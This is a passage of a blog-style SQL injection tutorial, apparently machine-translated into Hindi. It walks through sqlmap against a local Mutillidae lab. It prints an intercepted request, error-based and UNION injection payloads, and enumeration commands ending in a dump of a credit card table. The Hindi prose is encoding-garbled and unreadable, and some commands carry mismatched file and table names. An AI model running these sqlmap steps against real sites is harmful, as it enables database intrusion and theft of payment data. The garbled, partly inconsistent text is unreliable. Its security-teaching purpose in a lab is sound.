A1: 2017 - рдЗрдВрдЬреЗрдХреНрд╢рди (рднрд╛рдЧ 3 рдФрд░ рдЕрдВрддрд┐рдо)

рдореЗрд░реЗ рдкрд╕рдВрджреАрджрд╛ рдХрдВрдкреНрдпреВрдЯрд░ рдЧреЗрдо рдХреНрд╡реЗрд╕реНрдЯ рдлреЙрд░ рдЧреНрд▓реЛрд░реА 2 рдореЗрдВ: рдЯреНрд░рд╛рдпрд▓ рдмрд╛рдп рдлрд╛рдпрд░, рдЬрдм рджреБрдирд┐рдпрд╛ рдПрдХ рдмрд╛рд░ рдлрд┐рд░ рдЦрддрд░реЗ рдореЗрдВ рд╣реИ, рддреЛ рдореБрдЦреНрдп рдЪрд░рд┐рддреНрд░ рд╡рд┐рдЬрд╛рд░реНрдбреНрд╕ рд╡рд┐рд╢реНрд╡рд╡рд┐рджреНрдпрд╛рд▓рдп рдореЗрдВ рд╕рдорд╛рдкреНрдд рд╣реЛрддрд╛ рд╣реИред рдкреНрд░рд╡реЗрд╢ рдкрд░реАрдХреНрд╖рд╛рдУрдВ рдХреЛ рд╕рдлрд▓рддрд╛рдкреВрд░реНрд╡рдХ рдкрд╛рд╕ рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж, рджрд╛рдврд╝реА рд╡рд╛рд▓реЗ рдмреБрджреНрдзрд┐рдорд╛рди рдЬрд╛рджреВрдЧрд░ рдЗрд╕ рд╡рд┐рд╢реНрд╡рд╡рд┐рджреНрдпрд╛рд▓рдп рдореЗрдВ рдЬрд╛рдиреЗ рдХреА рдкреЗрд╢рдХрд╢ рдХрд░рддреЗ рд╣реИрдВ, рдХреНрдпреЛрдВрдХрд┐ рдЗрд╕реЗ рд╕рдорд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж, рд╣рдо рдЬрд╛рджреВ рдХреА рд╕рднреА рдЬрдЯрд┐рд▓рддрд╛рдУрдВ рдХреЛ рд╕рдордЭреЗрдВрдЧреЗ, рд╕рднреА рдордВрддреНрд░реЛрдВ рдХрд╛ рдЕрдзреНрдпрдпрди рдХрд░реЗрдВрдЧреЗ рдФрд░ рдлрд┐рд░ рд╣рдо рдирд┐рд╢реНрдЪрд┐рдд рд░реВрдк рд╕реЗ рдЕрдкрдиреЗ рджреЛрд╕реНрддреЛрдВ рдХреЛ рдмрдЪрд╛рдПрдВрдЧреЗ рдФрд░ рджреБрдирд┐рдпрд╛ рдХреА рдмреБрд░рд╛рдИ рдХреЛ рд╣рд░рд╛рдПрдВрдЧреЗред рдПрдХрдорд╛рддреНрд░ рд╕рдорд╕реНрдпрд╛ рдпрд╣ рд╣реИ рдХрд┐ рдЙрдиреНрд╣реЗрдВ 15-20 рд╡рд░реНрд╖реЛрдВ рддрдХ рдЕрдзреНрдпрдпрди рдХрд░рдирд╛ рд╣реЛрдЧрд╛, рдФрд░ рдЗрд╕ рд╕рдордп рдХреЗ рджреМрд░рд╛рди рдмреБрд░реА рд╢рдХреНрддрд┐рдпреЛрдВ рдХреЛ рдПрдХ рд╕реЗ рдЕрдзрд┐рдХ рдмрд╛рд░ рдкрд░рд╛рдЬрд┐рдд рдХрд░рдиреЗ рдХрд╛ рд╕рдордп рд╣реЛрдЧрд╛ред

рд╣рд░ рдмрд╛рд░ рдЬрдм рдореИрдВ рдЕрдирдкреЗрдХреНрд╖рд┐рдд рд░реВрдк рд╕реЗ рдЗрд╕ рдкреНрд░рдХрд░рдг рдХреЛ рдпрд╛рдж рдХрд░рддрд╛ рд╣реВрдВ, рдЬрдм рдореБрдЭреЗ рдПрдХ рдФрд░ рджрд┐рд▓рдЪрд╕реНрдк рдХрд┐рддрд╛рдм рдпрд╛ рддрдХрдиреАрдХреА рджрд╕реНрддрд╛рд╡реЗрдЬ рдХрд╛ рдвреЗрд░ рд▓рдЧрддрд╛ рд╣реИред рд╕рдордп рдкреНрд░рдмрдВрдзрди рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдмрд╣реБрдд рд╕рд╛рд░реА рдХрд┐рддрд╛рдмреЗрдВ рд▓рд┐рдЦреА рдЧрдИ рд╣реИрдВ, рд▓реЗрдХрд┐рди рдореЗрд░реЗ рд▓рд┐рдП рдпрд╣ рдПрдХ рд╕рд╛рдзрд╛рд░рдг рд╕реВрддреНрд░ рдХреЗ рд▓рд┐рдП рдЖрддрд╛ рд╣реИ: рдореВрд▓ рдмрд╛рддреЗрдВ рдкрддрд╛ рд▓рдЧрд╛рдирд╛, рдЙрджрд╛рд╣рд░рдгреЛрдВ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдирд╛ - рдлрд┐рд░ рдХреЗрд╡рд▓ рд╕реНрд╡рдЪрд╛рд▓рди!

рдЕрдм рдЬрдм рд╣рдореЗрдВ рдХреБрдЫ рдкрддрд╛ рд╣реИ рдХрд┐ рдЗрдВрдЬреЗрдХреНрд╢рди рдХреИрд╕реЗ рдХрд╛рдо рдХрд░рддреЗ рд╣реИрдВ, рддреЛ рд╣рдорд╛рд░реЗ рдЬреАрд╡рди рдХреЛ рд╕рд░рд▓ рдмрдирд╛рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХреНрдпреЛрдВ рди рдХрд░реЗрдВ рдФрд░ рдПрдХ рдмрд╛рд░ рдлрд┐рд░ рдХреБрдЫ рдЕрддреАрдд рдХрд╛ рдЙрджрд╛рд╣рд░рдг рджреЗрдВ, рд▓реЗрдХрд┐рди рдЕрддрд┐рд░рд┐рдХреНрдд рд╕реЙрдлрд╝реНрдЯрд╡реЗрдпрд░ рдХреА рдорджрдж рд╕реЗред рд╣рдореЗрдВ рджреЛ рдЙрдкрдХрд░рдг рдЪрд╛рд╣рд┐рдП:
Sqlmap - рдПрдХ рдЙрдкрдХрд░рдг рдЬреЛ рдЖрдкрдХреЛ SQL рдФрд░ ZAP рдкреНрд░реЙрдХреНрд╕реА рдореЗрдВ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреА рдЦреЛрдЬ рдФрд░ рд╢реЛрд╖рдг рдХреЛ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ - рдПрдХ рд╕реНрдерд╛рдиреАрдп рдкреНрд░реЙрдХреНрд╕реА рд╕рд░реНрд╡рд░ рдЬреЛ рд╡реЗрдм рд╕рд░реНрд╡рд░ рдореЗрдВ рдмреНрд░рд╛рдЙрдЬрд╝рд░ рдХреЗ рдмреАрдЪ рдпрд╛рддрд╛рдпрд╛рдд рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрд╡рд╢реНрдпрдХ рд╣реИред

рдлрд┐рд░, рдпрд╣ рдзреНрдпрд╛рди рджреЗрдиреЗ рдпреЛрдЧреНрдп рд╣реИ рдХрд┐ рдпреЗ рдПрдХрдорд╛рддреНрд░ рдРрд╕реЗ рдЙрдкрдХрд░рдг рдирд╣реАрдВ рд╣реИрдВ, рдФрд░ рдЕрдЧрд▓реЗ рдмреНрд▓реЙрдЧ рдореЗрдВ рдпрд╣ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐ рдЖрдк рдпрд╣ рд╕рд╛рдмрд┐рдд рдХрд░ рджреЗрдВрдЧреЗ рдХрд┐ sqlmap рдХреЗ рдмрдЬрд╛рдп рдЖрдкрдХреЛ sqlninja рд╕реЗ рдирд┐рдкрдЯрдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ, рдФрд░ рдмрд░реНрдк рд╣реЛрдиреЗ рдкрд░ рдЖрдкрдХреЛ ZAP рдХреЗ рд╕рд╛рде рд╕рдордп рдмрд┐рддрд╛рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИред рдореИрдВрдиреЗ рдХрд┐рд╕реА рдХреЗ рд╕рд╛рде рдмрд╣рд╕ рдирд╣реАрдВ рдХреАред

рд╣рдо рдХреНрд▓рд╛рдЗрдВрдЯ рдФрд░ рд╡реЗрдм рд╕рд░реНрд╡рд░ рдХреЗ рдмреАрдЪ рдпрд╛рддрд╛рдпрд╛рдд рдХреЛ рд░реЛрдХрдХрд░ рдЬреАрд╡рди рдХреЛ рдЖрд╕рд╛рди рдмрдирд╛рдирд╛ рд╢реБрд░реВ рдХрд░реЗрдВрдЧреЗред рдкрд░рд┐рдгрд╛рдореА рдбреЗрдЯрд╛ рдХреЛ sqlmap рдХреЗ рдорд╛рдкрджрдВрдбреЛрдВ рдХреЗ рд░реВрдк рдореЗрдВ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ред рджреНрд╡рд╛рд░рд╛ рдФрд░ рдмрдбрд╝реЗ, рдХрдордЬреЛрд░ рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдХрд╛ URL рднреА рдЗрд╕ рддрд░рд╣ рдХреЗ рдПрдХ рдкреИрд░рд╛рдореАрдЯрд░ рдХреЗ рд░реВрдк рдореЗрдВ рдХрд╛рдо рдХрд░ рд╕рдХрддрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдЕрдм рдкреНрд░реЙрдХреНрд╕реА рд╕реЗ рдбреЗрдЯрд╛ рд╣рдорд╛рд░реЗ рд▓рд┐рдП рд╕реНрдкрд╖реНрдЯ рд╣реЛрдЧрд╛ред

рд╣рдо A1 рд╕реЗ рдЙрд╕реА рдЙрджрд╛рд╣рд░рдг рдХреЗ рд╕рд╛рде рдХрд╛рдо рдХрд░реЗрдВрдЧреЗ, рдЬрд┐рд╕рдХрд╛ рд╣рдордиреЗ рдкрд┐рдЫрд▓реЗ рд▓реЗрдЦ ("SQLi - рдПрдХреНрд╕рдЯреНрд░реЗрдХреНрдЯ рдбреЗрдЯрд╛"> "рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЬрд╛рдирдХрд╛рд░реА (SQL)") рдореЗрдВ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд┐рдпрд╛ рдерд╛ред


рд╣рдо рдЕрдкрдиреЗ ZAP рдкреНрд░реЙрдХреНрд╕реА рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЗрд╕ рдкреГрд╖реНрда рдкрд░ рдЬрд╛рдПрдВрдЧреЗ рдФрд░ рдХреБрдЫ рдбреЗрдЯрд╛ рджрд░реНрдЬ рдХрд░реЗрдВрдЧреЗред рдореИрдВ рд╕рдордЭрддрд╛ рд╣реВрдВ рдХрд┐ рдкреНрд░рд▓реЛрднрди рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рд╣рдордиреЗ рдЬреЛ рдХреБрдЫ рднреА рд╕реАрдЦрд╛ рд╣реИ, рдЙрд╕рд╕реЗ рдХреБрдЫ рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╣реИ, рд▓реЗрдХрд┐рди рдЕрднреА рдЖрдкрдХреЛ рдХреЗрд╡рд▓ рд╕реНрдкрд╖реНрдЯ рд░реВрдк рд╕реЗ рдЧрд▓рдд рдбреЗрдЯрд╛ рджрд░реНрдЬ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред рдореИрдВ рдЕрдкрдирд╛ рдкрд╕рдВрджреАрджрд╛ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ / рдкрд╛рд╕рд╡рд░реНрдб рджрд░реНрдЬ рдХрд░рддрд╛ рд╣реВрдВ рдФрд░ рдЗрдВрдЯрд░рд╕реЗрдкреНрд╢рди рдореЗрдВ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдЕрдиреБрд░реЛрдз рдкреНрд░рд╛рдкреНрдд рдХрд░рддрд╛ рд╣реВрдВ:

GET http://127.0.0.1/mutillidae/index.php?page=user- info.php&username=admin&password=password&user-info-php-submit- button=View+Account+Details HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://127.0.0.1/mutillidae/index.php?page=user-info.php Cookie: showhints=1; PHPSESSID=aqvrdm615sm8k7isopefgbhega Connection: keep-alive Upgrade-Insecure-Requests: 1 Host: 127.0.0.1 

рдпрд╣рд╛рдБ рд╣рдо рдореБрдЦреНрдп рд░реВрдк рд╕реЗ рдкрд╣рд▓реА рдкрдВрдХреНрддрд┐ рдореЗрдВ рд░реБрдЪрд┐ рд░рдЦрддреЗ рд╣реИрдВ, рдЕрд░реНрдерд╛рддреН рдЕрдиреБрд░реЛрдзред рдХрднреА-рдХрднреА рдпрд╣ рдЬрд╛рдБрдЪрдирд╛ рдЙрдкрдпреЛрдЧреА рд╣реЛрддрд╛ рд╣реИ рдХрд┐ рдХреНрдпрд╛ рд╣рдордиреЗ рдЕрд╡рд░реЛрдзрди рдХрд┐рдпрд╛ рд╣реИред рдпрд╣ рдПрдХ рд╣реА рдмреНрд░рд╛рдЙрдЬрд╝рд░ рдореЗрдВ рдЗрд╕ рдЙрддреНрдкрдиреНрди рдЕрдиреБрд░реЛрдз рдХреЛ рджреЛрд╣рд░рд╛рдХрд░ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рдпрджрд┐ рд╣рдореЗрдВ рддреНрд░реБрдЯрд┐ рдХреЗ рд╕рд╛рде рд╡рд╣реА рдкреГрд╖реНрда рдорд┐рд▓рддрд╛ рд╣реИ, рддреЛ рд╣рдо рд╕рд╣реА рд░рд╛рд╕реНрддреЗ рдкрд░ рд╣реИрдВред

рд╣рдо рдПрдХ рдЕрд▓рдЧ рдлрд╝рд╛рдЗрд▓ request_sqlmap.txt рдХреЗ рд░реВрдк рдореЗрдВ рд╣рдорд╛рд░реЗ рдЕрд╡рд░реЛрдзрди рдЕрдиреБрд░реЛрдз рдХреЛ рд╕рд╣реЗрдЬреЗрдВрдЧреЗред

рдЕрдм, рдЗрд╕ рдлрд╝рд╛рдЗрд▓ рдХреЛ sqlmap рдХреЗ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХреЗ рд▓рд┐рдП рдкрд╛рд╕ рдХрд░рддреЗ рд╣реИрдВ:

 sqlmap -r reqest_sqlmap.txt --banner 

рд╣рдореЗрдВ рдпрд╣ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐ рд╣рдо рдХрд┐рд╕ DBMS рдХреЗ рд╕рд╛рде рдХрд╛рдо рдХрд░ рд░рд╣реЗ рд╣реИрдВ, рдпрд╣ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП sqlmap рдХреЗ рд▓рд┐рдП -banner рдкреИрд░рд╛рдореАрдЯрд░ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред рд╣рдорд╛рд░реЗ рдЙрджрд╛рд╣рд░рдг рдореЗрдВ, рдпрд╣ рдЗрддрдирд╛ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдирд╣реАрдВ рд╣реИ, рд▓реЗрдХрд┐рди рд╡реНрдпрд╡рд╣рд╛рд░ рдореЗрдВ, рдЖрдк рдЕрдиреНрдп DBMS рдХреЗ рдкрд╣рд▓реБрдУрдВ рд╕реЗ рд╡рд┐рдЪрд▓рд┐рдд рд╣реБрдП рдмрд┐рдирд╛ рдкрд░реАрдХреНрд╖рдг рдХреЛ рдЧрддрд┐ рджреЗ рд╕рдХрддреЗ рд╣реИрдВ рдЬреЛ рдЖрдкрдХреЗ рд▓рдХреНрд╖реНрдп рдкрд░ рд▓рд╛рдЧреВ рдирд╣реАрдВ рд╣реЛрддреЗ рд╣реИрдВред

 [23:19:48] [INFO] GET parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 181 HTTP(s) requests: --- Parameter: username (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=user-info.php&username=admin' AND (SELECT 5399 FROM(SELECT COUNT(*),CONCAT(0x7171707871,(SELECT (ELT(5399=5399,1))),0x71706a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UUZA'='UUZA&password=password&user-info-php-submit-button=View Account Details Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: page=user-info.php&username=admin' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171707871,0x4d754c5372467a65665a4c7672636e4c4a554777547162474e666f784e6b69754a43544a41675a50,0x71706a6271),NULL,NULL,NULL-- GGvT&password=password&user-info-php-submit-button=View Account Details --- [23:20:10] [INFO] the back-end DBMS is MySQL [23:20:10] [INFO] fetching banner web server operating system: Windows web application technology: Apache 2.4.29, PHP 7.2.3 back-end DBMS: MySQL >= 5.0 banner: '10.1.31-MariaDB' [23:20:10] [INFO] fetched data logged to text files under '/home/belowzero273/.sqlmap/output/127.0.0.1' 

рд╕реНрдХреИрди рд╕рдлрд▓рддрд╛рдкреВрд░реНрд╡рдХ рдкреВрд░рд╛ рд╣реЛ рдЧрдпрд╛ рдерд╛, рдФрд░ рд╣рдордиреЗ рдПрдХ рдмрд╛рд░ рдлрд┐рд░ рд╕реЗ рджреЗрдЦрд╛ рдХрд┐ рд╕рд╛рдорд╛рдиреНрдп рддреМрд░ рдкрд░, рд╣рдо рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдЬрд╛рдирддреЗ рдереЗ:

 [23:19:48] [INFO] GET parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable 

рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, sqlmap рдиреЗ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд┐рдпрд╛ рдХрд┐ рд╣рдо mysql, рдпрд╛ рдмрд▓реНрдХрд┐, рдЗрд╕рдХреЗ рдХрд╛рдВрдЯреЗ рдХреЗ рд╕рд╛рде рдХрд╛рдо рдХрд░ рд░рд╣реЗ рд╣реИрдВред рдЕрдм рджреЗрдЦрддреЗ рд╣реИрдВ рдХрд┐ рд╕рд░реНрд╡рд░ рдкрд░ рдХреМрди рд╕реЗ рдбреЗрдЯрд╛рдмреЗрд╕ рд╣реИрдВ:

 sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL --dbs 

рдЗрд╕рдХреЗ рдмрд╛рдж, рд╣рдо рдЕрдкрдиреА рдЗрдВрдЯрд░рд╕реЗрдкреНрд╢рди рдлрд╝рд╛рдЗрд▓ рдХреЛ sqlmap рдХреЗ рдкреИрд░рд╛рдореАрдЯрд░ рдХреЗ рд░реВрдк рдореЗрдВ рдЗрдВрдЧрд┐рдд рдХрд░реЗрдВрдЧреЗред рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рд╣рдо рдЙрди рдорд╛рдкрджрдВрдбреЛрдВ рдХреЛ рдЗрдВрдЧрд┐рдд рдХрд░реЗрдВрдЧреЗ рдЬреЛ рд╣рдо рдкрд╣рд▓реЗ рд╕реЗ рдЬрд╛рдирддреЗ рд╣реИрдВ: DBMS рдХрд╛ рдкреНрд░рдХрд╛рд░, рд╕рд╛рде рд╣реА рдореМрдЬреВрджрд╛ рдбреЗрдЯрд╛рдмреЗрд╕ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдбреЗрдЯрд╛ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП -dbs рд╕реНрд╡рд┐рдЪ:

 [23:27:19] [WARNING] reflective value(s) found and filtering out available databases [6]: [*] information_schema [*] mutillidae [*] mysql [*] performance_schema [*] phpmyadmin [*] test 


рдмрд╣реБрдд рдмрдврд╝рд┐рдпрд╛ред рдЖрдорддреМрд░ рдкрд░, рдбреЗрдЯрд╛рдмреЗрд╕ рдХреЛ рдХреБрдЫ рд╕рд╛рд░реНрдердХ рдирд╛рдо рджрд┐рдП рдЬрд╛рддреЗ рд╣реИрдВ, рдпрд╛ рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдЗрдВрд╕реНрдЯреЙрд▓ рдХрд░рддреЗ рд╕рдордп рд╡реЗ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рдмрдирд╛рдП рдЬрд╛рддреЗ рд╣реИрдВред "рдЕрд╕реНрдкрд╖реНрдЯрддрд╛ рд╕реЗ рд╕реБрд░рдХреНрд╖рд╛" рдХрд╛ рд╕рд┐рджреНрдзрд╛рдВрдд, рдирд┐рд╢реНрдЪрд┐рдд рд░реВрдк рд╕реЗ рд░рджреНрдж рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдпрд╣ рдирд┐рдпрдо рдХреЗ рдмрдЬрд╛рдп рдЕрдкрд╡рд╛рдж рд╣реИред рд╣рдорд╛рд░реЗ рдорд╛рдорд▓реЗ рдореЗрдВ рд╕рдмрд╕реЗ рджрд┐рд▓рдЪрд╕реНрдк рдмрд╛рдд, рдЬрд╛рд╣рд┐рд░рд╛ рддреМрд░ рдкрд░, рдЖрдзрд╛рд░ рдЙрддреНрдкрд░рд┐рд╡рд░реНрддреА рд╣реИ, рдЖрдЗрдП рджреЗрдЦреЗрдВ рдХрд┐ рдЗрд╕рдореЗрдВ рдХреНрдпрд╛ рд╢рд╛рдорд┐рд▓ рд╣реИрдВ:

 sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae --tables 

рдпрд╣рд╛рдБ, рд╣рдо рдЬрд╛рдирддреЗ рд╣реИрдВ рдХрд┐ рдЪреАрдЬреЛрдВ рдХреЗ рд▓рд┐рдП, рд╣рдо рдЗрд╕ рдбреЗрдЯрд╛рдмреЗрд╕ рдореЗрдВ рддрд╛рд▓рд┐рдХрд╛рдУрдВ рдХреЛ рджреЗрдЦрдиреЗ рдХреЗ рд▓рд┐рдП рдЖрд╡рд╢реНрдпрдХ DBMS рдФрд░ тАУtables рдХреБрдВрдЬреА рдЬреЛрдбрд╝реЗрдВрдЧреЗ:

 [23:29:42] [WARNING] reflective value(s) found and filtering out Database: mutillidae [13 tables] +----------------------------+ | accounts | | balloon_tips | | blogs_table | | captured_data | | credit_cards | | help_texts | | hitlog | | level_1_help_include_files | | page_help | | page_hints | | pen_test_tools | | user_poll_results | | youtubevideos | +----------------------------+ 

рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдмреБрд░рд╛ рдирд╣реАрдВ рд╣реИред рдХреНрд░реЗрдбрд┐рдЯ_рдХрд╛рд░реНрдб рддрд╛рд▓рд┐рдХрд╛ рд╡рд┐рд╢реЗрд╖ рд░реВрдк рд╕реЗ рдЖрд╢рд╛рдЬрдирдХ рджрд┐рдЦрддреА рд╣реИред рдЖрдЗрдП рдЗрд╕реЗ рджреЗрдЦреЗрдВ:

 sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae -T credita_cards --columns 

рдФрд░:

 [23:31:35] [WARNING] reflective value(s) found and filtering out Database: mutillidae Table: credit_cards [4 columns] +------------+---------+ | Column | Type | +------------+---------+ | ccid | int(11) | | ccnumber | text | | ccv | text | | expiration | date | +------------+---------+ 

рд╡рд╛рд╣, рд╡рд╣рд╛рдБ рдПрдХ рдкреВрд░реА рддрд╛рд▓рд┐рдХрд╛ рд╣реИ рдЬрд╣рд╛рдБ рдХреНрд░реЗрдбрд┐рдЯ рдХрд╛рд░реНрдб рдбреЗрдЯрд╛ рд╕рдВрдЧреНрд░рд╣реАрдд рдХрд┐рдпрд╛ рдЬрд╛рдирд╛ рдЪрд╛рд╣рд┐рдП! рдЕрдм рдЬрдм рд╣рдо рдЖ рдЧрдП рд╣реИрдВ, рддреЛ рдЖрдЗрдП рдЗрд╕ рддрд╛рд▓рд┐рдХрд╛ рдХреЛ рджреЗрдЦреЗрдВ:

 sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae -T credit_cards --dump 

рдЙрдлрд╝:

 [23:32:42] [WARNING] reflective value(s) found and filtering out Database: mutillidae Table: credit_cards [5 entries] +------+-----+----------------------------+-----------------+ | ccid | ccv | ccnumber | expiration | +------+-----+----------------------------+-----------------+ | 1 | 745 | 4444111122223333 | 2012-03-01 | | 2 | 722 | 7746536337776330 | 2015-04-01 | | 3 | 461 | 8242325748474749 | 2016-03-01 | | 4 | 230 | 7725653200487633 | 2017-06-01 | | 5 | 627 | 1234567812345678 | 2018-11-01 | +------+-----+----------------------------+-----------------+ 

рдпрд╣рд╛рдБ рд╡реЗ рд╣реИрдВ, рд╣рдорд╛рд░реЗ рдХреНрд░реЗрдбрд┐рдЯ рдХрд╛рд░реНрдбред рдЕрдм рдЖрдкрдХреЗ рджрд┐рдорд╛рдЧ рдореЗрдВ рджреЛ рд╕рд╡рд╛рд▓ рдЖрдиреЗ рдЪрд╛рд╣рд┐рдП: рдпрд╣ рдХреИрд╕реЗ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ, рдФрд░ рдпрд╣ рд╕рд╛рд░рд╛ рдбреЗрдЯрд╛ рдХрд╣рд╛рдВ рд╕реЗ рдЖрддрд╛ рд╣реИ?

рдпрд╣ рдХреИрд╕реЗ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ? рдареАрдХ рд╣реИ, рдХрдбрд╝рд╛рдИ рд╕реЗ рдмреЛрд▓рддреЗ рд╣реБрдП, рдпрд╣ рд╡рд╣реА рд╣реИ рдЬреИрд╕реЗ рдХрд┐ рдЖрдк рд╕рднреА рд╕рдВрднрд╛рд╡рд┐рдд рд╡рд┐рдХрд▓реНрдкреЛрдВ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЫрдВрдЯрдиреА рдХрд░ рд░рд╣реЗ рдереЗ, рдЗрд╕ рдпрд╛ рдЙрд╕ рднреЗрджреНрдпрддрд╛ рдХрд╛ рдлрд╛рдпрджрд╛ рдЙрдард╛рдиреЗ рдХреЗ рд▓рд┐рдП рдпрд╛рджреГрдЪреНрдЫрд┐рдХ рд░реВрдк рд╕реЗ рдХреЛрд╢рд┐рд╢ рдХрд░ рд░рд╣реЗ рдереЗред

рд▓реЗрдХрд┐рди рдбреЗрдЯрд╛ рдХрд╣рд╛рдВ рд╕реЗ рдЖрдпрд╛, рдпрд╣ рд╕рд╡рд╛рд▓ рдЙрд╕ рдкреНрд░рд╢рд╛рд╕рдХ рдХреЗ рд▓рд┐рдП рд╣реИ рдЬрд┐рд╕рдиреЗ рдЗрд╕ рддрд░рд╣ рдХреЗ рдЕрдиреБрдЪрд┐рдд рд╕реНрдерд╛рди рдкрд░ рдРрд╕реА рдорд╣рддреНрд╡рдкреВрд░реНрдг рдЬрд╛рдирдХрд╛рд░реА рдкреЛрд╕реНрдЯ рдХреА рд╣реИред

Sqlmap рдореЗрдВ рджрд░реНрдЬрдиреЛрдВ рдкреИрд░рд╛рдореАрдЯрд░ рд╣реИрдВ рдЬрд┐рдиреНрд╣реЗрдВ рд╣рдо рдПрдХ рд▓реЗрдЦ рдореЗрдВ рдкрд╛рд░реНрд╕ рдирд╣реАрдВ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рд▓реЗрдХрд┐рди рдореЗрд░реЗ рд▓реЗрдЦреЛрдВ рдХрд╛ рдХрд╛рд░реНрдп рд╕рдорд╛рдзрд╛рди рдкреЗрд╢ рдХрд░рдирд╛ рд╣реИ, рдФрд░ рдлрд┐рд░ рдпрд╣ рдЖрдк рдкрд░ рдирд┐рд░реНрднрд░ рд╣реИред рдмрд╛рдХреА рдЖрдзрд╛рд░реЛрдВ рдХреЛ рдЦреЛрджрдиреЗ рдФрд░ рдорд╛рдкрджрдВрдбреЛрдВ рдХреЗ рд╕рд╛рде рдкреНрд░рдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЕрдкрдиреЗ рдЕрд╡рдХрд╛рд╢ рдкрд░ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВ, рд╢рд╛рдпрдж рдХреНрд░реЗрдбрд┐рдЯ рдХрд╛рд░реНрдб рд╕рдмрд╕реЗ рджрд┐рд▓рдЪрд╕реНрдк рдирд╣реАрдВ рд╣реИрдВред =)

рдЗрд╕ рд▓рд┐рдВрдХ рдкрд░ рд▓реЗрдЦрдХ рдХрд╛ рдмреНрд▓реЙрдЧ рдкрдврд╝реЗрдВред

Source: https://habr.com/ru/post/hi429706/


All Articles